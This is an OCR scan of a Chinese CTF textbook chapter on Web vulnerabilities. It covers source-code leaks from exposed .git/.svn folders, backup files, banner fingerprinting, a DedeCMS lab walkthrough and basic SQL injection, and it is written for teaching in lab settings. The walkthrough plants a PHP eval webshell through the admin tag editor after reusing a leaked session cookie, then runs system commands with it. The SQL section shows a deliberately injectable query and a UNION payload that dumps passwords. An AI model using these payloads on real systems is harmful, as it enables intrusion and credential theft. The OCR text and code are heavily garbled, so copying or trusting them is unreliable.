本 章 将 分 别 介 绍 CTF 线 上 比赛 中 常见 的 各 种 Web 漏 洞 ， 通 过 相关 例题 解析 ， 尽 可 能 让 读者 对 CTF 线 
比赛 的 Web 类 题目 有 相对 全 面 的 了 解 。 但 是 Web 漏 洞 的 分 类 十 分 复杂 ， 和 希望 读者 在 阅读 本 书 的 同 引 
任 互联 网 上 了 解 相 关 知识 ， 这 样 才 可 以 达到 举 一 肥 三 的 目的 ， 以 便 提 升 目 身 能 力 。 


按照 漏洞 出 现 的 频率 、 漏 洞 的 复杂 程度 ， 我 们 将 Web 类 题目 分 为 入 门 、 进 阶 、 拓 展 三 个 层次 进行 介 
绍 。 讲 解 每 个 层次 的 漏洞 时 ， 我 们 辅 以 相关 例题 解析 ， 让 读者 更 直观 地 了 解 CTF 线 上 比赛 中 Web 类 题 
目 不 同 漏洞 审 来 的 影响 ， 由 浅 入 深 地 了 解 Web 类 题目 ， 清 鞍 自 身 技 能 的 不 足 ， 从 而 达到 弥补 的 目的 。 
本 草 从 “入 门 ”层次 开始 ， 介 绍 Web 类 题目 中 最 常见 的 3 类 漏洞 ， 即 信息 搜集 、SQL 注 入 、 任 意 文 
读 取 凋 洞 。 


书城 目录 
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1.1 举足轻重 的 信息 搜集 


1.1.1 信息 搜集 的 重要 性 


古人 云 “ 知 己 知 役 ， 百 战 不 只 ”， 在 现实 世界 和 比赛 中 ， 信 息 搜 集 是 前 期 的 必 备 工作 ， 也 是 重 中 之 
重 。 在 CTF 线 上 比赛 的 Web 类 题目 中 ， 信 息 搜集 涵 关 的 面 非 营 广 ， 有 备份 文件 、 目 录 信 息 、Banner 信 
乱 等 ， 这 瓯 需 要 参赛 者 有 丰富 的 经 验 ， 或 者 利用 一 些 脚本 来 帮助 自己 上 太 现 题目 信息 、 挖 掘 题目 漏洞 。 
本 会 尽 可 能 叙述 在 CTF 线 上 比赛 中 Web 类 题目 包含 的 信息 搜集 ， 也 会 推荐 一 些 作者 测试 无 误 的 开源 
二 


因为 信息 搜集 大 部 分 是 工具 的 使 用 (git 港 圳 可 能 涉及 git 命 令 的 应 用 ) ， 所 以 本 章 可 能 不 会 有 太 多 的 
技术 细 方 。 同 时 ， 因 为 信息 搜集 的 种 类 比较 多 ， 本 章 会 尽 可 能 地 洱 兰 ， 如 有 不 足 之 处 还 刻 理 解 ; 最 后 
会 通过 比赛 的 实际 例子 来 体现 信息 搜集 的 重要 性 。 


1.1.2 信息 搜集 的 分 类 


前 期 的 题目 信息 搜集 可 能 对 于 解决 CTF 线 上 比赛 的 题目 有 着 非常 重要 的 作用 ， 下 面 将 从 敏感 目录 、 繁 
感 备份 文 件 、Banner 识 别 三 方面 来 讲述 基础 的 信息 搜集 ， 以 及 如 何在 CTF 线 上 比赛 中 友 现 解 题 方向 。 


1.1.2.1 敏感 目录 泄露 
通过 敏感 目录 泄露 ， 我 们 往往 能 获取 网 站 的 源 代码 和 敏感 的 URL 地 址 ， 如 网 站 的 后 台地 址 等 。 
1. git 泄 需 


【漏洞 简介 】 git 是 一 个 主流 的 分 布 式 版 本 控制 系统 ， 开 友人 员 在 开 友 过 程 中 经 弟 会 遗 扎 .git 文 件 夹 ， 
导致 攻击 者 可 以 通过 .git 文 件 夹 中 的 信息 获取 开 友 人 员 提 人 交 过 的 所 有 源码 ， 进 而 可 能 导致 服务 器 被 攻 
击 而 沦陷 。 

(1) 昔 规 git 世 露 


常规 git 泄 露 : 即 没有 任何 其 他 操作 ， 参 赛 者 通过 运用 现成 的 工具 或 目 己 编写 的 脚本 即 可 获取 网 站 源码 
或 者 flag。 这 里 推荐 一 个 工具 : https://github.com/denny0223/scrabble， 使 用 方法 也 很 简单 : 
本 地 自行 搭建 Web 环 境 ， 见 图 1-1-1。 
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venenof@ubuntu:/var/www/html/git_ test$ git init 

Initialized empty Git repository in /var/www/html/git test/.git/ 
venenof@ubuntu:/var/ww/html/git_ test$ git add flag.php 
venenof@ubuntu:/var/www/html/git test$ git commit ~-m "flag" 
[master (root-commit) b4aff45] flag 

1 file changed, 1 insertion(+) 

create mode 100755 flag.php 
venenof@ubuntu:/var/www/html/git_ test$ 四 


国 呈 
运行 该 工具 ， 即 可 获取 源 代 码 ， 拿 到 flag， 见 图 1-1-2。 


venenof@ubuntu:~/scrabbles$ ./scrabble http://127.0.0.1/git_ test/ 
Reinitialized existing Git repository in /home/venenof/scrabble/.git/ 
parseCommit b4aff45c6aafd507e752846fddc54774344ca607 
downloadBlob b4aff45c6aafd507e752846fddc54774344ca607 

parseTree 8ff51e37233422f40bdaaf4e741c232349862663 

downloadBlob 8ff51e37233422f40bdaaf4e741c232349862663 
downloadBlob eceeaaa34291e36b22539db3908aad7258e6b9aa 

HEAD is now at b4aff45 flag 

venenof@ubuntu:~/scrabbles$ ls 

flag.php 

venenof@ubuntu:~/scrabbles$ cat flag.php 

flag{testaaa} 

venenof@ubuntu:~/scrabble$ 日 


(2) git 回 深 


git 作 为 一 个 版 本 控制 工具 ， 会 记录 每 次 提交 (commit) 的 修改 ， 所 以 当 题 目 存在 git 泄 露 时 ，flag 
(敏感 ) 文件 可 能 在 修改 中 被 删除 或 被 覆盖 了 ， 这 时 我 们 可 以 利用 git 的 “git reset” 命 令 来 恢复 到 


以 前 的 版 本 。 本 地 自行 搭建 Web 环 境 ， 见 图 1-1-3。 


venenof@ubuntu:/var/www/html/git_ test$ cat flag.php 
flag{testaaa} 
venenof@ubuntu:/var/ww/html/git_ test$ echo "flag is old”" > flag.php 
venenof@ubuntu:/var/ww/html/git_ test$ cat flag.php 
flag is old 
venenof@ubuntu:/var/ww/html/git_ test$ git add flag.php 
venenof@ubuntu:/var/ww/html/git_ test$ git commit -mm "old" 

[master 362276c] old 

1 file changed, 1 insertion(+), 1 deletion(-) 
venenof@ubuntu:/var/www/html/git_ test$ 四 


图 1-1-3 


我 们 先 利用 scrabble 工 具 获 取 源码 ， 再 通过 “git reset--hard HEAD^” 命 令 跳 到 上 一 版 本 (在 git 
中 ， 用 HEAD 表 示 当 前 版 本 ， 上 一 个 版 本 是 HEAD^) ， 即 可 获取 到 源码 ， 见 图 1-1-4。 


venenof@ubuntu:~/scrabble$ ./scrabble http://127.0.0.1/git test/ 
Reinitialized existing Git repository in /home/venenof/scrabble/.git/ 
parseCommit 362276c775e7b8b2ae7c8c7e6a0176417b58eccc 
downloadBlob 362276c775e7b8b2ae7c8c7e6a0176417b58eccc 

parseTree f557b115e61dfb9cb512f2a9ce1628b5dd406aad 

downloadBlob f557b115e61dfb9cb512f2a9ce1628b5dd406aad 
downloadBlob 3e9018d4fda0195c6e29f674de7a4ac7a9259c95 
parseCommit b4aff45c6aafd507e752846fddc54774344ca607 
downloadBlob b4aff45c6aafd507e752846fddc54774344ca607 

parseTree 8ff51e37233422f40bdaaf4e741c232349862663 

downloadBlob 8ff51e37233422f40bdaaf4e741c232349862663 
downloadBlob eceeaaa34291e36b22539db3908aad7258e6b9aa 

HEAD is now at 362276c old 

venenof@ubuntu:~/scrabble$ ls 


-mu 
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Ttag.pnp 
venenof@ubuntu:~/scrabbles$ cat flag.php 
flag is old 
venenof@ubuntu:~/scrabble$ git reset --hard HEAD^ 
HEAD is now at b4aff45 flag 
venenof@ubuntu:~/scrabbles$ ls 
flag.php 
venenof@ubuntu:~/scrabbles$ cat flag.php 
flag{testaaa} 
venenof@ubuntu:~/scrabble$ 


图 1-1-4 
除了 使 用 “git reset”， 更 简单 的 方式 是 通过 “git log-stat” 命 令 查 看 每 个 commit 修 改 了 哪些 文 
件 ， 再 用 “git diff HEAD commit-id ”比较 在 当前 版 本 与 想 查 看 的 commit 之 间 的 变化 。 


(3) git 分 支 


人 在 每 次 提交 时 ，git 都 会 目 动 把 它们 串 成 一 条 时 间 线 ， 这 条 时 间 线 融 是 一 个 分 文 。 而 git 人 允许 使 用 多 个 
分 文 ， 从 而 让 用 户 可 以 把 工作 从 开 友 主线 上 分 离 出 来 ， 以 免 影响 开 友 主线 。 如 果 没 有 新 建 分 文 ， 那 么 
只 有 一 条 时 间 线 ， 即 只 有 一 个 分 支 ，git 中 默认 为 master 分 支 。 因 此 ， 我 们 要 找 的 flag 或 敏感 文件 可 
能 不 会 藏 在 当前 分 支 中 ， 这 时 使 用 “git log” 命 令 只 能 找到 在 当前 分 支 上 的 修改 ， 并 不 能 看 到 我 们 想 
要 的 信息 ， 因 此 需要 切换 分 支 来 找到 想 要 的 文件 。 


现在 大 多 数 现成 的 git 世 露 工具 都 不 支持 分 文 ， 如 果 需 要 还 原 其 他 分 支 的 代码 ， 往 往 需 要 手工 进行 文件 
的 提取 ， 这 里 以 功能 较 强 的 GitHacker (https://github.com/WangYihang/GitHacker) 工具 为 
例 。GitHacker 的 使 用 十 分 简单 ， 只 需 执 行 命令 “python GitHacker.py http://127.0.0.1:8000/. 
git/”。 运 行 后 ， 我 们 会 在 本 地 看 到 生成 的 文件 夹 ， 进 入 后 执行 “git log--all” 或 “git branch-v” 
命令 ， 只 能 看 到 master 分 支 的 信息 。 如 果 执 行 “git reflog” 命 令 ， 就 可 以 看 到 一 些 checkout 的 记 
录 ， 见 图 1-1-5。 


图 1-1-5 
可 以 看 到 ， 除 了 master 还 有 一 个 secret 分 文 ， 但 目 动 化 工具 只 还 原 了 master 分 支 的 信息 ， 因 此 需要 手 
动 下 载 secret 分 支 的 head 信 息 ， 保 存 到 .git/refs/heads/secret 中 (执行 命令 “wget http://127.0. 
0.1:8000/.git/refs/heads/secret”) 。 恢 复 head 信 息 后 ， 我 们 可 以 复 用 GitHacker 的 部 分 代码 ， 
以 实现 目 动 恢复 分 支 的 效果 。 在 GitHacke[ 的 代码 中 可 以 看 到 ， 他 是 先 下 载 object 文 件 ， 再 使 用 git 四 
检测 ， 并 继续 下 载 缺 失 的 文件 。 此 处 可 以 直接 复 用 检测 缺失 文件 并 恢复 的 fixmissing 函 数 。 我 们 注 
释 掉 程序 最 后 调用 main 的 部 分 ， 修 改 为 如 下 代码 : 


temppath = repalce_bad_chars(get_prefix(baseurl)) 
ivmiccinefhacan nat+h) 


tamn 
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dd ed dd sh 


修改 后 重新 执行 “python GitHacker.py” 人 命令， 运行 该 脚本 ， 再 次 进入 生成 的 文件 夹 ， 执 行 gw 
--all” 或 “git branch-v” 命 令 ， 则 secret 分 支 的 信息 就 可 以 恢复 了 ， 从 git log 中 找到 对 应 提交 
的 hash，, 执行 “git diff HEAD b94c” (b94c 为 hash 的 前 4 位 ) 命令 ， 即 可 得 到 flag， 见 图 1-1-6。 


diff --git a/hello.php b/hello.php 
index Ola0202..ce01302 1000644 

--- a/hello.php 

+++ b/hello.php 


diff -~--git a/secret.php b/secret .php 
new flile mode 1000644 

index 0000000. .b479dc4 

-= /dev/null 

+++ D/Secret ,php 


(4) gitt 露 的 其 他 利用 


除了 查看 源码 的 常见 利用 方式 ， 港 露 的 git 中 也 可 能 有 其 他 有 用 的 信息 ， 如 .git/config 文 件 夹 中 可 能 
有 access token 信 息 ， 从 而 可 以 访问 这 个 用 户 的 其 他 仓库 。 


P/N Pus 


SVN (subversion) 是 源 代码 版 本 管理 软件 ， 造 成 SVN 源 代码 漏洞 的 主要 原因 是 管理 员 操 作 不 规范 将 
SVN 隐 藏 文件 夹 暴露 于 外 网 环境 ， 可 以 利用 .svn/entries 或 wc.db 文 件 获 取 服 务 器 源码 等 信息 。 这 里 推 
存 两 个 工具 : https://github.com/kost/dvcs-ripper，Seay-svn (Windows 下 的 源 代码 备份 漏洞 
利用 工具 ) 。 


3. HG 泄露 


在 初始 化 项 目 时 ，HG 会 在 当前 文件 夹 下 创建 一 个 .hg 隐藏 文件 夹 ， 其 中 包含 代码 和 分 支 修改 记录 等 信 
息 。 这 里 推荐 工具 : https://github.com/kost/dvcs-ripper。 


三 三 \ 二 HZ 一 一 、 上 = - 导 一 下 一 SE FE 
二 三 I NES! 目 凤 开 大 P= 二 Sr -二 
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://github.com/maurosoria/dirsearch. 


5 ee 1 EE Ke [Wy 
， 如 果 有 文件 内 容 返 回 ， 就 说 明 存 在 gt 泄露 ， 反 之 ， 一 般 不 存在 。 而 在 SVN 泄 圳 中 ， 一 般 是 在 
中 慌 取 源 代码 ， 但 有 时 会 出 现 entries 为 空 的 情况 ， 这 时 注意 wc.db 文 件 存在 与 否 ， 便 可 通过 其 中 
的 checksum 在 pristine 文 件 夹 中 获取 源 代码 。 


1.1.2.2 敏感 备份 文件 
一 些 敏 感 的 备份 文件 ， 我 们 往往 能 获得 某 一 文件 的 源码 ， 永 或 网 站 的 整体 目录 等 。 
1. gedit 备 份 文件 


住 Linux 下 ， 用 gedit 编 辑 器 保存 后 ， 当 前 目录 下 会 生成 一 个 后 缀 为 “~ ”的 文件 ， 其 文件 内 容 束 是 刚 
编辑 的 内 容 。 假 设 刚 才 保 存 的 文件 名 为 flag， 则 该 文件 名 为 flag ~ ， 见 图 1-1-7。 通 过 浏览 器 访问 这 
市 月 “~” 的 文件 , 便 可 以 得 到 源 代码 。 


图 1-1-7 
2. vim 备 份 文件 


vim 是 目前 运用 得 最 多 的 Linux 编 辑 器 ， 当 用 户 在 编辑 文件 但 意外 退出 时 (如 通过 SSH 和 连接 到 服务 器 
时 ， 在 用 vim 编 辑 文 件 的 过 程 中 可 能 过 到 因为 网 速 不 够 导致 的 命令 行 卡 死 而 意外 退出 的 情况 ) ， 会 在 


当前 目录 下 生成 一 个 备份 文件 ， 文 件 名 格式 为 : 


该 文 件 用 来 备份 组 ;中 区 中 的 内 容 即 退出 时 的 文件 内 容 ， 见 图 1-1-8。 


图 1-1-8 
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针对 SWP 备 份 文件 ， 我 们 可 以 用 “vim-r” 命令 恢复 文件 的 内 容 。 这 里 先 模拟 执行 “vim flag” 命 
令 ， 随 后 直接 关闭 客户 端 ， 当 前 目录 下 会 生成 一 个 .flag.swp 文 件 。 恢 复 SWP 备 份 文件 的 办 法 是 ， 先 在 
当前 目录 下 创建 一 个 flag 文 件 ， 再 使 用 “vim-rflag” 命令 ， 即 可 得 到 意外 退出 时 编辑 的 内 容 ， 见 图 1 
-1-9。 








图 1-1-9 
3. 常规 文件 


常规 文件 所 依靠 的 无 非 束 是 字典 的 饱和 性 ,不 论 是 CTF 比 赛 中 还 是 现实 世界 中 ， 我 们 都 会 碰 到 一 些 经 
典 的 有 辨识 的 文件 ， 从 而 让 我 们 更 好 地 了 解 网 站 。 这 里 只 是 简单 举 一 些 例子 ， 具 体 还 需要 读者 用 心 搜 
集 记 录 。 


学 robots.txt: 记录 一 些 目录 和 CMS 版 本 信息 。 
多 readme.md: 记录 CMS 版 本 信息 ， 有 的 甚至 有 Github 地 址 。 
学 WWW.zip/rar/tar.gz: 往往 是 网 站 的 源码 备份 。 

4. 总 结 经 验 


企 CTF 线 上 比赛 的 过 程 中 ， 出 题 人 往往 会 在 线 运 维 题目 ， 有 时 会 因为 各 种 情况 导致 SWP 备 份 文 件 的 生 
成 ， 所 以 读者 在 比赛 过 程 中 可 以 编写 实时 监控 脚本 ， 对 题目 服务 进行 监控 。 


vim 在 第 一 次 意外 退出 时 生成 的 备份 文件 为 .swpP ， 第 二 次 意外 退出 时 的 为 *.swo， 第 三 次 退出 时 的 为 
*.SWn， 以 此 类 推 。vim 的 官方 手册 中 还 有 ”*.un. 文 件 名 .swp 类 型 的 备份 文件 。 


男 外， 在 实际 环境 中 ， 网 站 的 备份 往往 可 能 是 网 站 域名 的 压缩 包 ，。 


1.1.2.3 Banner 识 别 


在 CTF 线 上 比赛 中 ， 一 个 网 站 的 Banner 信 息 (服务 器 对 外 显示 的 一 些 基础 信息 ) 对 解 题 有 着 十 分 重要 
的 作用 ， 选 手 往往 可 以 通过 Banner 信 息 来 获得 解 虞 思路 ， 如 得 项 网 站 是 用 ThinkPHP 的 Web 框 染 编写 
时 ， 我 们 可 以 舌 试 ThinkPHP 框 架 的 相关 历史 漏洞 。 或 者 得 知 这 个 网 站 是 Windows 服 务 器 ， 那 么 我 们 
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在 测试 上 传 漏洞 时 可 以 根据 Windows 的 特性 进行 芝 试 。 这 里 介绍 最 冲 用 的 两 种 Banneng 只 别 方 式 。 
1. 自行 搜集 指纹 库 


Github 上 有 大 量 成 型 上 且 公 开 的 CMS 所 纹 库 ， 读 者 可 以 目 行 得 找 ， 同 时 可 以 信众 一 些 成 型 扫 摘 器 对 网 


站 进行 识别 。 
2 . 使 用 已 有 工具 


我 们 可 以 利用 Wappalyzer 工 具 ( 见 图 1-1-10) ， 同 时 提供 了 成 型 的 Python 库 ， 用 法 如 下 : 


$ pip instaLL python-Wappalyzer 

>>> from WappaLyzer import Wappalyzer, WebPage 

>>> WappaLyzer = Wappalyzer.latest() 

>>> Webpage = Webpage.new_from_url('http://example.com') 
> wappalyzer.analyze(webpage) 

set([u'EdgeCast']) 


< >》 C 





Venenof7'sB 


不 要 把 别人 的 帮助 当做 理所当然 ， 既 然 别人 看 @@ Bootsrap 320 


是 FatUl 


四 EEC -~ 


图 1-1-10 
企 data 目 录 下 ，apps.json 文 件 是 其 规则 库 ， 读 者 可 以 根据 目 己 需求 目 由 添加 。 


3. 总 结 经 验 


在 进行 服务 器 的 Banner 信 息 探 测 时 ， 除 了 通过 上 述 两 种 常见 的 识别 方式 ， 我 们 还 可 以 党 试 随意 输入 一 
些 URL， 有 时 可 以 通过 404 页 面 和 302 跳 转 页 面 友 现 一 些 人 信息。 例如， 开局 了 debug 选 项 的 ThinkPHP 
网 站 会 在 一 些 错误 页 面 显 示 ThinkPHP 的 版 本 。 


1.1.3 从 信息 搜集 到 题目 解决 
下 面 通 过 一 个 CTF 靶 场 赛场 景 的 复 盘 ， 来 展示 如 何 从 信息 搜集 到 获得 flag 的 过 程 。 


1. 环境 信息 
w/ale [oN A 
学 PHPstudy 2018 (开启 目录 遍历 ) 。 


学 DedeCMS ( 织 梦 CMS， 未 开局 会 员 注 册 ) 。 
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通过 访问 网 站 ， 根 据 观 察 和 Wappalyzer 的 提示 ( 见 图 1-1-11 和 图 1-1-12) ， 我 们 可 以 友 现 这 是 搭建 
在 Windows 上 的 DedeCMS， 访 问 默 认 后 台 目 录 发 现 是 404， 见 图 1-1-13。 


QQ 不 安全 | 192.168.102.194/uploads/index.php?upcache=1 
织 梦 CMS - 轻松 建站 从 此 开始 ! 


建站 各 此 毅 单 ) 


内 容 管 理 系统 (CMS) 
篇 DedeCMS 

分 析 

24 Google Analytics 
编程 语言 


php PHP 


图 1-1-11 
” @ 不 安全 | 192.168.102.194/asd 
Not Found 


The requested URL /asd was not found on this server. 


图 1-1-12 


和 > CG gg 不 安全 | 192.168.102.194/uploads/dede/ 


Not Found 
The requested URL /uploads/dede/ was not found on this server. 
加: 
这 时 我 们 可 以 联想 到 DedeCMS 在 Windows 服 务 器 上 存在 后 全 目录 爆破 漏洞 (漏洞 成 因 在 这 里 不 过 多 
J = ， 我 们 在 本 地 运行 爆破 脚本 ， 得 到 目录 为 zggga111， 见 图 1-1-14。 


但 是 经 过 测试 ， 我 们 皮 现 其 关闭 了 会 员 注 册 功 能 ， 也 融 意 味 着 我 们 不 能 利用 会 员 密 码 重 置 漏洞 来 重 阐 
管理 员 密 码 。 我 们 应 该 怎么 办 ? 其 实 ， 在 DedeCMS 中 ， 只 要 管理 员 登 录 过 后 台 ， 就 会 在 data 目 录 下 
有 一 个 相应 的 session 文 件 ， 而 这 个 题目 恰好 没有 关闭 目录 声 历 ， 见 图 1-1-15。 所 以 我 们 可 以 获得 官 
理 员 的 session 值 ， 通 过 editcookie 修 改 Cookie， 从 而 成 功 进入 后 台 ， 见 图 1-1-16。 


然后 在 蛋 板 的 标签 源码 雁 月 管理 中 插入 一 段 六 意 代 码 ， 即 可 执行 任意 命令 ， 见 图 1-1-17 和 图 1-1-18。 


venenof@ubuntu:/tmp$ python 1.py 
Z 


zg 


Z999 
zggga 
zgggal 
zgggall 
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zgggal11 
zgggal11 


venenof@ubuntu: /tmp$ | 


图 1-1-14 


€ CG © 不 安全 | 192.168.102.194/uploads/data/sessions_40b6938a56/ 


Index of /uploads/data/sessions_40b6938a56 


e Parent Directory 


图 1-1-15 
be 
”  @ 不 安全 | 192.168.102.194/uploads/zggga111/index.php 


http://192.168.102.194/uploads/zgggal111/index.php 
» 192.168.102.194 | _csrf_name_acOcc0a4 
欢迎 使 用 专业 的 PHP 网 站 管理 系统 ， 轻 
» 192.168.102.194 | _csrf_name_acOcc0a4__ckMd5 
| »192.168.102.194 | dede_admin_id 
和 


ons 4 * 192.168.102.194 | menuitems 


著 | 印 吵 | 潜 泪 | 汉 上 | 范 关 | 5 基本 


图 1-1-16 


人 标签 源码 碎片 管理 >> 新 建 标签 


。 默认 模板 管理 
ni 新 建 标签 (修改 源码 如 果 出 现 语法 错误 ， 可 能 导 至 标签 无 法 使 用 ， 请 修改 前 先 作 好 数据 备份) 


9 自 定义 宏 标记 文件 名 称 demotag.lib.php (不 允许 用 “..” 形 式 的 路 径 ) 


9 智能 标记 向 导 标签 文件 名 为 : 标签 名 .lib.php 
9 全 局 标记 测试 标签 格式 说 明 。 接口 函数 定义 为 : function lib_ 标 签名 (&Sctag,&SrefObj)， 返 回 值 是 结果 字符 串 
Sn 修改 标签 时 为 了 防止 出 错 ， 您 也 可 以 修改 它 的 名 称 (同时 修改 文件 名 和 函数 名 )， 这 样 等 同 维 承 了 原来 标签 的 代码 建立 


1 <?php 
9 参考 文档 2 @eval($_GET[1]} 
9 意见 建议 反馈 3 if(idefined('DEDEINC’)) 
9 官方 交流 论坛 4{ 


5 exit("Request Errort"); 
} 


心 
要 
块 
生 
成 
采 
集 
会 
员 
模 
板 
系 
统 


6 
7 function lib_demotag(&$ctag,&$refObj) 
81{ 

9 global $dsql,Senvs; 


图 1-1-17 


€ > CO © 不 安全 | 192.168.102.194/uploads/include/taglib/demotag.lib.php?1=system(%27ipconfig%27); 六 


. . : 255.255.255.0 默认 网 关 
已 断 开 连接 特定 的 DNS 后 缀 


图 1-1-18 
3. 总 结 


EE MISE 


学 一 是 服务 器 的 信息 ， 针 对 Windows 服 务 器 ， 大 概率 意味 着 我 们 去 寻找 CM3 人 在 其 上 的 一 蔚 漏 
闻 。 


a = DE lS 
最 后 的 RCE (Remote Command/Code Execute， 远 程 命 令 / 代 人 码 执 行 ) 。 
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1.2 CTF 中 的 SQL 注入 


Web 应 用 开发 过 程 中 ， 为 了 内 容 的 快速 更 新 ， 很 多 开发 者 使 用 数据 库 进行 数据 存储 。 而 由 于 开发 者 在 
程序 编写 过 程 中 ， 对 传 入 用 户 数据 的 过 滤 不 严格 ， 将 可 能 存在 的 攻击 载 符 拼接 到 SQL 查询 语句 中 ， 再 
将 这 些 查询 语句 传递 给 后 端的 数据 库 执行 ， 从 而 引发 实际 执行 的 语句 与 预期 功能 不 一 致 的 情况 。 这 种 
攻击 被 称 为 SQL 注 入 攻击 。 


大 多 数 应 用 在 开发 时 将 诸如 密码 等 的 数据 放 在 数据 库 中 ， 由 于 SQL 注 入 攻击 能 够 泄露 系统 中 的 敏感 信 
息 ,使 之 成 为 了 进入 各 Web 系 统 的 入 口 级 漏洞 ， 因 此 各 大 CTF 赛 事 将 SQL 注 入 作为 Web 题 目的 出 题 点 
之 一 ，SQL 注 入 漏洞 也 是 现实 场景 下 最 常见 的 漏洞 类 型 之 一 。 


本 节 将 介绍 SQL 注 入 的 原理 、 利 用 、 防 御 和 绕 过 方法 。 考 虑 到 篇 幅 ， 同 时 SQL 注 入 的 原理 相似 ， 所 以 
这 里 仅 针对 比赛 出 题 过 程 中 使 用 得 最 多 的 MySQL 数 据 库 的 注入 攻击 进行 介绍 ， 而 不 对 Access、 


[Taue) 
SQL Server、NoSsQL 等 进行 详细 介绍 。 读 者 在 阅读 本 章 时 需要 有 一 定 的 SQL 和 PHP 基 础 。 


1.2.1 SQL 注入 基础 


SQL 注入 是 开 上 太 者 对 用 户 输入 的 参数 过 滤 不 严格 ， 导 致 用 户 输入 的 数据 能 够 影响 预 设 得 询 功能 的 一 种 
技术 ， 通 党 将 导致 数据 库 的 原 有 信息 泄露 、 复 改 ， 甚 至 被 删除 。 本 节 用 一 些 简 单 的 例子 详细 介绍 SQL 
注入 的 基础 ， 包 括 数 字 型 注入 、UNION 注 入 、 字 符 型 注入 、 布 尔 盲 注 、 时 间 注入 、 报 错 注 入 和 堆 妓 
注入 等 注入 方式 和 对 应 的 利用 技巧 。 


【测试 环境 】Ubuntu 16.04 (IP 地 址 : 192.168.20.133) ，Apache，MySQL 5.7，PHP 7.2。 


1.2.1.1 数字 型 注入 和 UNION 注 入 
第 一 个 例子 的 PHP 部 分 源 代码 (sql1.php) 如 下 (代码 含义 见 注释 ) 。 


sql1.php 


<?php 
// 连接 本 地 MySQL， 数 据 库 为 test 
ysqli_connect("127.0.0.1", "root", "root", "test"); 
// 查询 Wp_news 表 的 title、content 字段 ，id 为 GET 输入 的 值 
$res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id=".$_GET['id']); 
// 说 明 : 代码 和 命令 对 于 SQL 语句 不 区 分 大 小 写 ， 书 中 为 了 让 读者 清晰 表示 ， 对 于 关键 字 采 用 大 写 形式 
// 将 查询 到 的 结果 转化 为 数组 
$row = mysqli_fetch_array($res); 


ter>"; 
// 输出 结果 中 的 title 字段 值 
echo "<hl>".$row['title']."</h1l>"; 


echo "<br>"; 

// 输出 结果 中 的 content 字段 值 

echo "<hl>".$row['content']."</hl>"; 
echo "</center>"; 


数据 库 的 表 结 构 见 图 1-2-1。 新 闻 表 wp_news 的 内 容 见 图 1-2-2。 用 户 表 wp user 的 内 容 见 图 1-2-3。 
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sqli | it is the beginning 
have fun | have fun Dapy'! 





本 节 的 目标 是 通过 HTTP 的 GET 方 式 输 入 的 id 值 ， 将 本 应 查询 新 闻 表 的 功能 转变 成 查询 admin (通常 为 
管理 员 ) 的 账号 和 密码 (密码 通常 是 hash 值 ， 这 里 为 了 演示 变 为 明文 this is_ the admin_ 


AassWor 
) 。 管 理 员 的 账号 和 密码 是 一 个 网 站 系统 最 重要 的 凭据 ， 入 侵 者 可 以 通过 它 登录 网 站 后 台 。 从 而 控 
制 整个 网 站 内 容 . 


通过 网 页 访问 链接 http://192.168.20.133/sql1.php? id=1， 结 果 见 图 1-2-4。 


©O@e® DD 192.168.20.133/sql1.php?id=1 x 十 


= Q@ 不 安全 | 192.168.20.133/sql1.php?id=1 六 各 了 加 凶 BE Ee 
535 应 用 技术 文章 2 GitHub 加 Tuisec 安 全 热点 苇 Google 翻译 ”人 狼 Sec-News 安全 文摘 


sqli 


it is the beginning 
图 1-2-4 
页 面 显示 的 内 容 与 图 1-2-2 的 新 闻 表 wp_news 中 的 第 一 行 id 为 1 的 结果 一 致 。 事 实 上 ，PHP 将 GET 方 法 
传 入 的 id=1 与 前 面 的 SQL 查 询 语句 进行 了 拼接 。 原 查询 语句 如 下 : 


$res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id=".$_GET['id']); 


收 到 请 求 http://192.168.20.133/sql1.php? id=1 的 $ GET['id'] 被 赋值 为 1， 最 后 传 给 MySQL 的 
查询 语句 如 下 : 


SELECT title, content FROM wp_news WHERE :id = 1 


我 们 直接 在 MySQL 中 查询 也 能 得 到 相同 的 结果 ， 见 图 1-2-5。 


图 1-2-5 


现在 互联 网 上 绝 大 多 数 网 站 的 内 容 是 预先 存储 在 数据 库 中 ， 通 过 用 户 传 入 的 id 等 参数 ， 从 数据 库 的 数 
据 中 查询 对 应 记录 ， 再 显示 在 浏览 器 中 ， 如 https://bbs.symbo1.comy/tytopic/53 中 的 “53”， 见 
图 1-2-6。 


Defcon China 靶场 题 - 内 网 渗透 Writeup 
硬 CTF 技 蓄 cd, 内 网 安全 
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[ HHMIEESEH 
图 1-2-6 


下 面 演示 通过 用 户 输入 的 id 参数 进行 SQL 注入 攻击 的 过 程 。 


访问 链接 http://192.168.20.133/sql1.php? id=2， 可 以 看 到 图 1-2-7 中 显示 了 图 1-2-2 中 id 为 2 的 
记录 ， 再 访问 链接 http://192.168.20.133/sql1.php? id=3-1， 可 以 看 到 页 面 仍 显示 id=2 的 记 
录 ， 见 图 1-2-8。 这 个 现象 说 明 ，MySQL 对 “3-1” 表 达 式 进行 了 计算 并 得 到 结果 为 2， 然 后 查询 了 id 
=2 的 记录 。 


从 数字 运算 这 个 特征 行为 可 以 判断 该 注入 点 为 数字 型 注入 ， 表 现 为 输入 操 “$ GET['id'] ”附近 没有 引 
号 包 暑 (从 源码 也 可 以 证 明 这 点 ) ， 这 时 我 们 可 以 直接 输入 SQL 查 询 语 句 来 干扰 正常 的 查询 (结果 见 
图 1-2-9) : 


SELECT title, content FROM wp_news WHERE id = 1 UNION SELECT user, pwd FROM wp_user 


© Nm 192168.20133/sql.php?id=2 x 人 腾讯 首页 x | 十 
《 > C © 不 安全 | 192.168.20.133/sql1.php?id=2 广 waog 四 i ee : 
洋 应 用 国 技术 文章 0 GitHub 加 Tuisec 安 全 热点 ” 著 Google 翻译 ” 仿 Sec-News 安全 文摘 
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have fun baby! 
图 1-2-7 正 弟 的 查询 链接 


have fun 


have fun baby! 


图 1-2-9 
这 个 SQL 语 句 的 作用 是 查询 新 闻 表 中 id=1 时 对 应 行 的 title、content 字 段 的 数据 ， 并 且 联 合 查询 用 户 
表 中 的 user、pwd ( 即 账号 密码 字段 ) 的 全 部 内 容 。 


我 们 通过 网 页 访问 时 应 只 输入 id 后 的 内 容 ， 即 访问 链接 : http://192.168.20.133/sql1.php? id=1 
union select user，pwd from wp_user。 结 果 见 图 1-2-10， 图 中 的 “%20” 是 空格 的 URL 编 码 。 
浏览 器 会 自动 将 URI 中 的 特殊 字符 进行 URL 编 码 ， 服 务 器 收 到 请 求 后 会 自动 进行 URL 解 码 。 


